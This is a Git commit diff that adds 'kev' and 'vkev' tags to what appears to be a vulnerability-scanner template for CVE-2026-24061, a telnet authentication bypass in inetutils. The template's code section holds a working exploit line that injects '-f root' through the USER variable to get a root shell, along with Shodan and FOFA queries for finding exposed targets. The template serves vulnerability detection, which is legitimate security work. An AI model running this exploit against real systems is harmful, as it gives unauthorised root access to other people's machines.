Add 'kev' and 'vkev' tags to CVE-2026-24061

This commit is contained in:
Dhiyaneshwaran
2026-01-26 07:53:26 +05:30
committed by GitHub
parent 94a8b76b0e
commit 8a1ec2cc69

View File

@@ -26,12 +26,13 @@ info:
product: inetutils
shodan-query: port:23 telnet
fofa-query: port="23" && protocol="telnet"
tags: cve,cve2026,telnet,auth-bypass,rce,code
tags: cve,cve2026,telnet,auth-bypass,rce,code,kev,vkev
code:
- engine:
- sh
- bash
source: |
(sleep 2; echo "id"; sleep 2) | USER="-f root" telnet -a $Host $Port